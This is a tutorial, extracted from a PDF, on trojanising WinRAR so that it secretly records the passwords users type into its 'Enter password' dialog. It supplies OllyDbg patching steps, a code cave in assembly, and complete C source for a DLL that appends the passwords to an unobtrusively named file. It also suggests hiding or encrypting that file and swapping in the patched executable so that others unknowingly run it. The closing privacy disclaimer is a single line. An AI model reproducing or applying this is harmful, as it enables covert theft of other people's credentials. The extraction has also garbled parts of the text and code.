writing a winrar key logger

8/9/2019 Writing a WinRAR Key Logger

1/11

This document is a short tutorial on writing akey logger for winrar. This key logger only logs

password used for opening encryptedarchives in winrar

WinRARWriting a Key logger

Extreme [email protected]


2/11

Writing a WinRAR Key logger

AbstractIn this tutorial I will show how to write a WinRAR key logger. This key logger is different from other key loggers that

are available on the net in the sense that it does not require any installation or starting any background hiddenprocess/services that hijacks the keyboard and listens for key presses. This key logger is also not truly a key logger. Itonly logs password typed on the Enter passwor d dialog box as shown below.

Whenever the user types a password and presses OK/Enter, the password is automatically saved to a file. However,if the user purposely or mistakenly enters a wrong password, that too is also saved. Another limitation is that thepath of the file is not saved, so while on one hand you get the passwords, on the other you do not get to know whichfiles they are associated with.


3/11

Tools Required WinRAR from http://www.rarlab.com Ollydbg from http://www.ollydbg.de Multiline Ultimate Assembler aka Multimate Assembler plugin from http://rammichael.com/multimate-

assembler CFF Explorer from http://www.ntcore.com Resource Hacker from http://www.angusj.com Any C Compiler like Visual C++, MinGW, BCC, Digital Mars, Pelles C etc.

WinRAR v5.01 is the latest version available at the time of writing. Any other version would do. You may use the trialversion available if you do not own WinRAR.

The latest version of Ollydbg is v2.01 released on September 28,2013. Any other version would do . You may also useImmunity Debugger if you prefer i t.

Multiline Ultimate Assembler is a plugin which will simplify your reversing sessions greatly and make it writing

codecaves easier. The plugin is available for both Ollydbg and Immunity debugger. You may also prefer to workwithout it but using it is highly recommended. For using it simply drop it in the Ollydbg plugins directory.

CFF Explorer is a free PE Editor, but any other would work as well.

Lastly any C compiler would do. You may use an IDE or a text editor according to your tastes.

Overview

In this section I will give a brief overview about our work ahead. The main idea is that we will find when the appreads the password from the textbox. At that point we will transfer the execution to a codecave. The codecave inturn will call another function from a dll. The dll will then do the actual work of reading the password from thetextbox and writing it to a file. The advantages of using a dll as compared to coding the entire thing in the code caveis that we can write the dll in a higher language (like C, C++, Delphi etc ) than assembly. Also debugging becomeseasier. We can also implement new features (such as saving the passwords in an encrypted file) without touching theexecutable.
http://www.rarlab.com/http://www.rarlab.com/http://www.ollydbg.de/http://www.ollydbg.de/http://rammichael.com/multimate-assemblerhttp://rammichael.com/multimate-assemblerhttp://rammichael.com/multimate-assemblerhttp://www.ntcore.com/http://www.ntcore.com/http://www.angusj.com/http://www.angusj.com/http://www.angusj.com/http://www.ntcore.com/http://rammichael.com/multimate-assemblerhttp://rammichael.com/multimate-assemblerhttp://www.ollydbg.de/http://www.rarlab.com/


4/11

Studying the binaryBefore, starting our work, it is always a good idea to study the target thoroughly. So load the binary in CFF Explorer.

So the target is not packed or protected. Another feature of this binary it was compiled with relocations. That meansthe executable can load at a different base address other than the image base. Relocations are necessary for dll s, butnot for an exe since they are generally the first one to get loaded in the address space. We need to disable thisfeature; otherwise the exploi t developed may not work on another machine.

So in CFF Explorer browse to Optional Headers -> Dll characteristics and uncheck the `DLL can move` flag.

Now save the file. You may also wish to keep a backup of the original file.


5/11

Now we need to know about the `Enter password` dialog that pops out on opening a password protected file. Soload the file in Resource Hacker. Now under the Dialog` tree look for the Enter password` dialog. You can easily findthat one as Resource Hacker shows a preview of the dialog. In our case the one we are looking for is the`GETPASSWORD2` dialog as shown below. Now also keep a note of the textbox on which we type our passwords. Inthis case it is a combobox with an ID of 101. Remember this ID for later use.


6/11

Finding the point of attackNow after getting all the necessary information about the binary we need to find the point where we could divertthe normal execution to jump to a codecave which we would be creating. So first create a rar archive with passwordprotection. Load the binary in Ollydbg. It will stop on the Entry Point, so press F9 to run. Now open the rar archivepreviously created and open a password protected file. The Enter password` dialog pops up. Now just type anythingfor the password but do not press OK.

If you have read the help that comes with WinRAR, it says that it supports Unicode in both fi lenames and passwords.Additionally passwords are limited to 127 characters in length.

We have to find out where the app reads the password. In Ollydbg search for all intermodular calls and sort theresults according to their destination.

The GetDlgItemTextW` function reads the text of a control in a buffer. Here W` stands for wide character strings i.e.Unicode.So in the calls window navigate to the function, right click and put a breakpoint on every call toGetDlgItemTextW.

With the breakpoints set in place just click on `Ok` in the `Enter password` dialog. Immediately one of ourbreakpoints is hit. Now we know the location the app reads the password. So delete all other breakpoints except thecurrent one.


7/11

In the stack on the bottom right you can see the parameters passed to GetDlgItemTextW` . You can notice that theControlID passed is 65 in hex or 101 in decimal, the same we obtained from resource hacker. Another thing to note isthe handle of the window is in esi which is pushed on the stack. You can step over the call and see that the bufferaddress to the function is fi lled with the entered password.

So from this point we need to redirect our execution to a codecave which would call a function in a dll , and the dll inturn would write the password in a file. We also need to pass the handle of the window (which is in esi) to thatfunction which we would be writing soon.

Now we need to find some empty bytes where we would be assembling our codecave. Finding them is easy, justnavigate towards the end of the code and you will find plenty of free bytes marked as db 00.

In my case I chose to write the codecave at 004B94E0. Now lets go back to our earlier location where the breakpointwas hit. We need to jump from this place to our codecave. Here I chose to write the jump at 00450C0F. Now copythe original instructions here as it would be overwritten by the jump instruction. Just press Spacebar on the l ine andcopy what is displayed inthe `Assemble` dialog.Preserve this copied text

for later use. Now in the`Assemble` dialog makesure `Fill with N OPs ` ischecked. Now write,

JMP 004B94E0

and press assemble onceand then close the dialog.

Empty Bytes


8/11

Coding the DLLCreate a new file named rar.c. Now open Visual C++ and create a Project from existing code. Add the file rar.c tothe project.

Now write the following to rar.c

#include LPWSTR path[255];LPWSTR password[255];

BOOL WINAPI DllMain (HINSTANCE hInst,DWORD reason,LPVOID reserved){

return TRUE;}

__declspec ( dllexport ) void __stdcall dumpPassword(HWND win){

char *pos,*i;HANDLE handle;LPDWORD noOfBytesWritten;

//Get the password from the textboxGetDlgItemTextW(win,101,password,128);

//Get the path to the currently running exeGetModuleFileNameW(NULL,path,250);

//This path contains the full name including the name of the exe//So we need to remove the filename to get the directory

i=( char *)path;while (!(*i==0 && *(i+1)==0)){

if (*i== '\\' && *(i+1)==0) pos=i;i+=2;

}*pos=0;

//The filename where the passwords will be dumpedlstrcatW(path,L "\\rar.dbf" );

//Get the handle to the file, create the file if it does not existshandle=CreateFileW(path,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_

ATTRIBUTE_NORMAL,NULL);

//return in case of errorif (handle==NULL) return ;

//Navigate to the end of the fileSetFilePointer(handle,0,NULL,FILE_END);

//Now dump the passwordWriteFile(handle,password,lstrlenW(password)*2+2,&noOfBytesWritten,NULL);

//Close the fileCloseHandle(handle);

}


9/11

The source code is fairly well documented. The dll has only a single exported function dumpPassword` and it takes ahandle to the window as an argument. We are using the stdcall calling convention, so the function will automaticallyadjust the stack pointer on returning.

The handle passed is used to read the password by calling `GetDlgItemTextW` . The second parameter toGetDlgItemTextW is the ID of the control whose text we want to read. In this case it is 101, which we found earlierusing Resource Hacker.

We then find the location of the main executable , using `GetModuleFileNameW` . It returns the full path as anUnicode string. We then parse the string to remove the file name and get the full path of the directory.

The only thing left is writing the password to disk. We can chose any file name and it is better to use an inobtrusiveone such as rar.dat, rar.dbf etc. Using `CreateFileW` we get a handle to file. We open the file in append mode, so incase the file exists we wil l append to the file instead of overwriting it. If the file does not exists a new one will becreated.

We navigate to the end of the file using `SetFilePointer`, and write the password using WriteFile`. Then finally we

close the handle to the file.

Note that we are just dumping the passwords in plain text; you may also choose to encrypt the passwords beforedumping, so in case someone finds the file (which is rare), he will understand nothing. You may even hide the file(hint: see the MSDN documentation on CreateFileW).

The last thing left in this section is to view the dll fi le produced in CFF Explorer. This is necessary because the namesof exported functions are generally mangled and unless you know the correct exported name you cannot call thefunction. You can see that the function is actually exported as `_dumpPassword@4`. Keep a note of this name.


10/11

Writing the codecaveJump back to Ollydbg. We need to find location of two functions LoadLibraryA` and GetProcAddress . The firstfunction is used to load a dll. The second function returns the address of an exported function previously loadedusing LoadLibrary.

To make sure the exploit works on another computer we will not use the absolute address of these two functions.

We fill find the pointer which uses a jump table to calls these function.

So in Ollydbg right click and search for all intermodular calls. Navigate to LoadLibraryA in the names window andpress Enter to go to the call in the disassembler window. Now press Spacebar to get the actual function pointer.

Similary repeat the steps to get the pointer to GetProcAddress.

Now jump to the point where we would write the codecave i.e. at 004B94E0. Click on Plugins -> Multil ine UltimateAssembler and write the following and then click Assemble`

Press Enter

push eax ;;save eax push @libName

call dword ptr [4BA254] ;;LoadLibraryAtest eax,eax ;;Check if LoadLibraryA succeeds jz @end

push @procName

push eaxcall dword ptr [4BA3E4] ;;GetProcAddresstest eax,eaxjz @end ;;Check if GetProcAddress succeeds

push esi ;;the pointer to the handle of the dialog call eax ;;call dumpPassword jmp @end

@libName:"rar.dll\0" ;;The name off the dll (null terminated)

@procName:"_dumpPassword@4\0" ;;The name of the function (null terminated)

@end: pop eax ;;Restore eax mov ebp,dword ptr [4BA680] ;;Overwritten call

jmp 450c15 ;;Continue normal execution


11/11

Finishing and testingWe can dump the process now. Right click on Ollydbg CPU window and click Copy to executable -> All modifications.If any warnings pop up (concerning modified fixups) simply answer yes.

In the new File window that pops up right click -> Save and provide a name to save the file.

Now we can test our newly modified exe, but before that copy rar.dll we previously created to the WinRARdirectory. Now rename the original (unmodified exe) to a different name and the newly created file to WinRAR.exe.This way we can ensure that whenever someone opens a rar archive it is the modified exe that opens.

Now for testing simply open a password protected archive, provide any password and click Ok. If everything wasright then you would see a f ile rar.dbf being created in the WinRAR directory. Open the file with notepad and youwould see the password you typed. Continue providing new passwords and they would be appended to the file.Another thing to note is that since the passwords are Unicode strings, notepad may not display correctly. In thatevent use any hex editor to open the file. There are plenty of them existing and free for use.

That concludes this tutorial. However use your newly gained knowledge in a positive way, do not use this to sneak

up the passwords of rar archives. Respect the privacy of others.

writing a winrar key logger

Documents